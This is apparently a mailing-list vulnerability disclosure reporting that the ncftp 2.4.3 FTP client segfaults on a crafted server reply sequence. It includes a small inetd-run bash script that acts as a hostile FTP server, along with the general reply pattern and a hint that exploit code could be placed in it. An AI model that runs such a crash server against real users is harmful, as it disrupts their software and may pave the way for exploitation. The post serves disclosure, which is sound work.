ncftp 2.4.3 bug

[paul () BOEHM ORG (Paul Boehm)]

Hi,

i think i've found a bug in ncftp 2.4.3 (latest stable release)...
if you connect to a ftp server that responds with something like the
shit below ncftp2.4.3 segfaults. i think this is exploitable,
but had no time/motivation to look further into it.

probably this isn't very dangerous anyway cause
your victim needs to connect willingly, and using ncftp to your server..
that won't happen very often unless
you've been talking with your victim before.

anyway i thought it may be a good idea to post it, so here it is:

--snip-- ncftpcrashd.sh
#!/bin/bash
# ncftp2.4.3 crash by infected () cia at
#   Start this using inetd. (port 21)

echo "331 hi, barbie.. wanna crash with me?"
echo "230 sure ken!"
echo "then hop in"
--snip--

every reply that looks like this works:
331 a
230 b
c[putting here some exploit code may work]

bye,
    paul

PS: i have no clue why this crashes ncftp... i haven't looked through
    ncftp's source, but maybe someone else will.

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Name: Paul S. Boehm               ||  Freelance Security Consulter.
    Email: paul () is destructive org  ||  PGPkey available at:
       Url: http://paul.boehm.org/  ||  http://paul.boehm.org/paul-pgp.asc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
There is is no reason for any individual to have a computer in their home.
              --Ken Olsen (Digital Corp CEO) 1977.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-